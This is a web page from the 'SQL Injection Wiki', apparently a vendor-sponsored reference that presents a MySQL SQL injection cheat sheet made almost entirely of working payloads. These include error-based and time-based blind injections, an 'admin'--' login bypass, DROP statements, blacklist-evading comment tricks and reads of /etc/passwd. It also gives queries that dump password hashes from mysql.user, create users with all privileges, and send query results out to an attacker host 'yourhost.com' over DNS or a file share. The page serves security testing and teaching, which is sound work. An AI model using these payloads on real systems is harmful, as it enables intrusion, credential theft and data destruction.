The SQL Injection Wiki project aims to provide all bells and whistles about SQL Injection. It is a good reference for both seasoned web security professionals and those who are just starting. This project website is frequently updated and currently includes detailed documentation about SQL Injection attack variants for the below list of databases:

The SQL Injection Wiki is sponsored by Netsparker, an automated false positive free web vulnerability scanner. Download a free trial.

MySQL SQL Injection Cheat Sheet

 

 

Back to top

Version   SELECT @@VERSION 
 SELECT version()
Current User  SELECT user()
 SELECT system_user()
Current Database  SELECT database()

Back to top

Error Based SQLi  For integer inputs:

 (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

 For string inputs:

 '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'

 The attacks above should throw 'duplicate entry' errors.
Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.

 product.php?id=4
 product.php?id=5-1
 product.php?id=4 OR 1=1
 product.php?id=-1 OR 17-7=10

Back to top

###  Use this when you can not see any difference at output. Second do not use more than 30 seconds, because database API connection timeout could be easily reached. 
### This is just like sleep, wait for spesified time. CPU safe way to make database wait.

 SLEEP(25)--
 SELECT BENCHMARK(1000000,MD5('A'));
Real World Samples  ProductID=1 OR SLEEP(25)=0 LIMIT 1--
 ProductID=1) OR SLEEP(25)=0 LIMIT 1--
 ProductID=1' OR SLEEP(25)=0 LIMIT 1--
 ProductID=1') OR SLEEP(25)=0 LIMIT 1--
 ProductID=1)) OR SLEEP(25)=0 LIMIT 1--
 ProductID=SELECT SLEEP(25)--

Back to top

DROP sampletable;--
DROP sampletable;#

Username : admin'--
                : admin' or '1'='1'--

SELECT * FROM members WHERE $username = 'admin'--' AND $password = 'password'

This is going to log you as admin user, because rest of the SQL query will be ignored.

Back to top

Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.
  • DROP/*comment*/sampletable
  • DR/**/OP/*bypass blacklisting*/sampletable

Back to top

Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.

MySQL If Statement

  • IF condition true-part ELSE false-part
  • SELECT IF (1=1, ‘true’, ‘false’)

If Statement SQL Injection Attack Samples

SELECT IF(user()='root@localhost','true','false')

Back to top

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))

This will return ‘KLM’.

Back to top

Insert a file content to a table.

SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; --

Back to top

' UNION ALL SELECT LOAD_FILE('/etc/passwd') --

SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
This will show the content of c:\boot.ini

Back to top

Possible with using UDF (user defined functions).


Back to top

CREATE USER username IDENTIFIED BY 'password'; --

Back to top

DROP USER username; --

Back to top

GRANT ALL PRIVILEGES ON *.* TO username@'%';

Back to top

  • SELECT * FROM 'user' WHERE 1 LIMIT 0,30
  • SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
  • SELECT * FROM mysql.user

Back to top

  • SELECT user, password FROM mysql.user
  • SELECT user, password FROM mysql.user LIMIT 1,1
  • SELECT password FROM mysql.user WHERE user = 'root'

Back to top

  • SELECT schema_name FROM information_schema.schemata;
  • SELECT schema_name FROM information_schema.schemata LIMIT 1,1;

Back to top

  • SELECT Super_priv FROM mysql.user WHERE user=(SELECT user) LIMIT 1,1--
  • SELECT Super_priv FROM mysql.user WHERE user= ‘root’ LIMIT 1,1--

Back to top

SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'

tblUsers -> tablename

Back to top

SELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers

tblUsers -> tablename

SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';

find table which have a column called 'username'

Back to top

  • information_schema (>= mysql 5.0)
  • mysql

Back to top

  • SELECT @@datadir
  • C:\AppServ\MySQL\data\

Back to top

?vulnerableParam=-99 OR IF((ASCII(MID(({INJECTON}),1,1)) = 100),SLEEP(14),1) = 0 LIMIT 1--

{INJECTION} = You want to run the query.

If the condition is true, will response after 14 seconds. If is false, will be delayed for one second.

Back to top

?vulnerableParam=-99 OR (SELECT LOAD_FILE(concat('\\\\',({INJECTION}), 'yourhost.com\\'))) Makes a NBNS query request/DNS resolution request to yourhost.com

?vulnerableParam=-99 OR (SELECT ({INJECTION}) INTO OUTFILE '\\\\yourhost.com\\share\\output.txt') Writes data to your shared folder/file

{INJECTION} = You want to run the query.